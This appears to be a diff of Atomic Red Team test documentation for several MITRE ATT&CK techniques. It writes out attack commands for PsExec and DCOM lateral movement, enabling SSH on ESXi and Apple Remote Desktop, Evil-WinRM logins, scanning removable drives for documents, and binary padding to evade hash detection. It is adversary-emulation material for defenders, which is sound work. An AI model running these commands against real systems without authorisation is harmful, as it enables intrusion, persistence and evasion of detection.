Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
**Supported Platforms:** Windows
**auto_generated_guid:** `0eb03d41-79e4-4393-8e57-6344856be1cf`
#### Inputs
**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_path | File to copy and execute | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
| remote_host | Remote computer to receive the copy and execute the file | string | &#92;&#92;localhost|
| psexec_exe | Path to PsExec | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;PsExec.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
@@ -105,25 +139,42 @@ New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "#{psexec_exe}" -Force
```
### Atomic Test #4: Execute command writing output to local Admin Share
<br/>
<br/>
## Atomic Test #4 - Execute command writing output to local Admin Share
Executes a command, writing the output to a local Admin Share.
This technique is used by post-exploitation frameworks.
**Supported Platforms:** Windows
**auto_generated_guid:** `d41aaab5-bdfe-431d-a3d5-c29e9136ff46`
#### Inputs
**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Remote computer to receive the copy and execute the file | string | output.txt|
| command_to_execute | Command to execute for output. | string | hostname|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
```
<br/>
atomics/T1021.003/T1021.003.md
+50 -28
View File
@@ -1,24 +1,27 @@
# T1021.003 - Remote Services: Distributed Component Object Model
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/003)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
>
> The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
>
> Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
>
> Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
[Source](https://attack.mitre.org/techniques/T1021/003)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)
</blockquote>
## Atomic Tests
- [Atomic Test #1: PowerShell Lateral Movement using MMC20](#atomic-test-1-powershell-lateral-movement-using-mmc20)
- [Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object](#atomic-test-2-powershell-lateral-movement-using-excel-application-object)
- [Atomic Test #1 - PowerShell Lateral Movement using MMC20](#atomic-test-1---powershell-lateral-movement-using-mmc20)
### Atomic Test #1: PowerShell Lateral Movement using MMC20
- [Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object](#atomic-test-2---powershell-lateral-movement-using-excel-application-object)
<br/>
## Atomic Test #1 - PowerShell Lateral Movement using MMC20
Powershell lateral movement using the mmc20 application com object.
Reference:
@@ -29,22 +32,35 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
**auto_generated_guid:** `6dc74eb1-c9d6-4c53-b3b5-6f50ae339673`
#### Inputs
**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of Computer | string | localhost|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```
### Atomic Test #2: PowerShell Lateral Movement Using Excel Application Object
<br/>
<br/>
## Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object
Powershell lateral movement using the Excel COM objects.
Reference:
@@ -55,16 +71,22 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** Windows
**auto_generated_guid:** `505f24be-1c11-4694-b614-e01ae1cd2570`
#### Inputs
**auto_generated_guid:** 505f24be-1c11-4694-b614-e01ae1cd2570
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Hostname or IP | string | localhost|
| user | Name of user | string | admin|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
@@ -72,18 +94,16 @@ $com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Appli
$com.ActivateMicrosoftApp("5")
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe'
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Microsoft Excel must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
try {
New-Object -COMObject "Excel.Application" | Out-Null
@@ -91,10 +111,12 @@ try {
exit 0
} catch { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
```
<br/>
atomics/T1021.004/T1021.004.md
+49 -33
View File
@@ -1,35 +1,44 @@
# T1021.004 - Remote Services: SSH
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/004)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
>
> SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the users public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the users public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).
[Source](https://attack.mitre.org/techniques/T1021/004)
</blockquote>
## Atomic Tests
- [Atomic Test #1: ESXi - Enable SSH via PowerCLI](#atomic-test-1-esxi---enable-ssh-via-powercli)
- [Atomic Test #2: ESXi - Enable SSH via VIM-CMD](#atomic-test-2-esxi---enable-ssh-via-vim-cmd)
- [Atomic Test #1 - ESXi - Enable SSH via PowerCLI](#atomic-test-1---esxi---enable-ssh-via-powercli)
### Atomic Test #1: ESXi - Enable SSH via PowerCLI
- [Atomic Test #2 - ESXi - Enable SSH via VIM-CMD](#atomic-test-2---esxi---enable-ssh-via-vim-cmd)
<br/>
## Atomic Test #1 - ESXi - Enable SSH via PowerCLI
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
**Supported Platforms:** Windows
**auto_generated_guid:** `8f6c14d1-f13d-4616-b7fc-98cc69fe56ec`
#### Inputs
**auto_generated_guid:** 8f6c14d1-f13d-4616-b7fc-98cc69fe56ec
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name of the ESXi Server | string | atomic.local|
| vm_user | Specify the privilege user account on ESXi Server | string | root|
| vm_pass | Specify the privilege user password on ESXi Server | string | pass|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
@@ -37,42 +46,47 @@ Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Stop-VMHostService -Confirm:$false
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Check if VMWARE PowerCLI PowerShell Module is installed.
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-Module -Name VMware.PowerCLI
```
### Atomic Test #2: ESXi - Enable SSH via VIM-CMD
<br/>
<br/>
## Atomic Test #2 - ESXi - Enable SSH via VIM-CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
**Supported Platforms:** Windows
**auto_generated_guid:** `280812c8-4dae-43e9-a74e-1d08ab997c0e`
#### Inputs
**auto_generated_guid:** 280812c8-4dae-43e9-a74e-1d08ab997c0e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vm_host | Specify the host name or IP of the ESXi server. | string | atomic.local|
@@ -80,32 +94,34 @@ An adversary enables SSH on an ESXi host to maintain persistence and creeate ano
| vm_pass | Specify the privileged user's password. | string | password|
| plink_file | Path to Plink | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;plink.exe|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Check if we have plink
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
```
<br/>
atomics/T1021.005/T1021.005.md
+27 -13
View File
@@ -1,21 +1,23 @@
# T1021.005 - Remote Services:VNC
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/005)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computers display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computers display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
>
> VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
>
> Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
[Source](https://attack.mitre.org/techniques/T1021/005)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Enable Apple Remote Desktop Agent](#atomic-test-1-enable-apple-remote-desktop-agent)
- [Atomic Test #1 - Enable Apple Remote Desktop Agent](#atomic-test-1---enable-apple-remote-desktop-agent)
### Atomic Test #1: Enable Apple Remote Desktop Agent
<br/>
## Atomic Test #1 - Enable Apple Remote Desktop Agent
ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer.
Adversaries can abuse ARD to gain remote code execution and perform lateral movement.
@@ -23,16 +25,28 @@ References: https://www.mandiant.com/resources/blog/leveraging-apple-remote-des
**Supported Platforms:** macOS
**auto_generated_guid:** `8a930abe-841c-4d4f-a877-72e9fe90b9ea`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 8a930abe-841c-4d4f-a877-72e9fe90b9ea
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop -configure -privs -none -quiet
```
<br/>
atomics/T1021.006/T1021.006.md
+67 -34
View File
@@ -1,110 +1,143 @@
# T1021.006 - Remote Services: Windows Remote Management
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1021/006)
<blockquote>
## Description from ATT&CK
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
> Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
>
> WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)
[Source](https://attack.mitre.org/techniques/T1021/006)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Enable Windows Remote Management](#atomic-test-1-enable-windows-remote-management)
- [Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2-remote-code-execution-with-ps-credentials-using-invoke-command)
- [Atomic Test #3: WinRM Access with Evil-WinRM](#atomic-test-3-winrm-access-with-evil-winrm)
- [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)
### Atomic Test #1: Enable Windows Remote Management
- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command)
- [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm)
<br/>
## Atomic Test #1 - Enable Windows Remote Management
Powershell Enable WinRM
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
**Supported Platforms:** Windows
**auto_generated_guid:** `9059e8de-3d7d-4954-a322-46161880b9cf`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Enable-PSRemoting -Force
```
### Atomic Test #2: Remote Code Execution with PS Credentials Using Invoke-Command
<br/>
<br/>
## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command
Simulate lateral movement with PowerShell Remoting on the local host.
Upon successful execution, PowerShell will execute `whoami` using `Invoke-Command`, targeting the
local machine as remote target.
**Supported Platforms:** Windows
**auto_generated_guid:** `5295bd61-bd7e-4744-9d52-85962a4cf2d6`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
#### Attack Commands: Run with `powershell`!
```powershell
Enable-PSRemoting -Force
Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Disable-PSRemoting -Force
```
### Atomic Test #3: WinRM Access with Evil-WinRM
<br/>
<br/>
## Atomic Test #3 - WinRM Access with Evil-WinRM
An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
**Supported Platforms:** Windows
**auto_generated_guid:** `efe86d95-44c4-4509-ae42-7bfd9d1f5b3d`
#### Inputs
**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | Username | string | Domain&#92;Administrator|
| destination_address | Remote Host IP or Hostname | string | Target|
| password | Password | string | P@ssw0rd1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have Ruby Installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe" https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe
$file1= "PathToAtomicsFolder\..\ExternalPayloads\rubyinstaller-2.7.1-1-x64.exe"
Start-Process $file1 /S;
```
##### Description: Computer must have Evil-WinRM installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
try {if (evil-winrm -h) {exit 0} else {exit 1}} catch {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
gem install evil-winrm
```
<br/>
atomics/T1025/T1025.md
+24 -9
View File
@@ -1,19 +1,21 @@
# T1025 - Data from Removable Media
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1025)
<blockquote>
## Description from ATT&CK
Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
> Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
>
> Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.
[Source](https://attack.mitre.org/techniques/T1025)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Identify Documents on USB and Removable Media via PowerShell](#atomic-test-1-identify-documents-on-usb-and-removable-media-via-powershell)
- [Atomic Test #1 - Identify Documents on USB and Removable Media via PowerShell](#atomic-test-1---identify-documents-on-usb-and-removable-media-via-powershell)
### Atomic Test #1: Identify Documents on USB and Removable Media via PowerShell
<br/>
## Atomic Test #1 - Identify Documents on USB and Removable Media via PowerShell
This test simulates an attack where PowerShell is used to detect connected USB or other removable storage devices and gather a list of specific document files
(e.g., .docx, .xls, .txt, .pdf). The command works by first identifying removable drives on the system and then recursively searching through each one for files
matching the targeted extensions. If no removable drives are present, the script will return a message stating that no media is detected. This behavior mimics
@@ -21,11 +23,24 @@ how adversaries might scan for sensitive documents on removable devices for exfi
**Supported Platforms:** Windows
**auto_generated_guid:** `0b29f7e3-a050-44b7-bf05-9fb86af1ec2e`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 0b29f7e3-a050-44b7-bf05-9fb86af1ec2e
#### Attack Commands: Run with `command_prompt`!
```cmd
powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ForEach-Object { Get-ChildItem -Path ($_.DriveLetter + ':\*') -Recurse -Include '*.doc*','*.xls*','*.txt','*.pdf' -ErrorAction SilentlyContinue | ForEach-Object {Write-Output $_.FullName} } ; if (-not (Get-Volume | Where-Object {$_.DriveType -eq 'Removable'})) { Write-Output 'No removable media.' }"
```
<br/>
atomics/T1027.001/T1027.001.md
+49 -33
View File
@@ -1,35 +1,44 @@
# T1027.001 - Obfuscated Files or Information: Binary Padding
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/001)
<blockquote>
## Description from ATT&CK
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
> Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.
>
> Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
[Source](https://attack.mitre.org/techniques/T1027/001)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1-pad-binary-to-change-hash---linuxmacos-dd)
- [Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS](#atomic-test-2-pad-binary-to-change-hash-using-truncate-command---linuxmacos)
- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
### Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd
- [Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS](#atomic-test-2---pad-binary-to-change-hash-using-truncate-command---linuxmacos)
<br/>
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
Uses dd to add a zero byte, high-quality random data, and low-quality random data to the binary to change the hash.
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `ffe2346c-abd5-4b45-a713-bf5f1ebd573a`
#### Inputs
**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes
@@ -37,69 +46,76 @@ dd if=/dev/random bs=1 count=1 >> #{file_to_pad} #adds high-quality random data
dd if=/dev/urandom bs=1 count=1 >> #{file_to_pad} #adds low-quality random data
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm #{file_to_pad}
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: The binary must exist on disk at specified location (#{file_to_pad})
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
cp /bin/ls #{file_to_pad}
```
### Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS
<br/>
<br/>
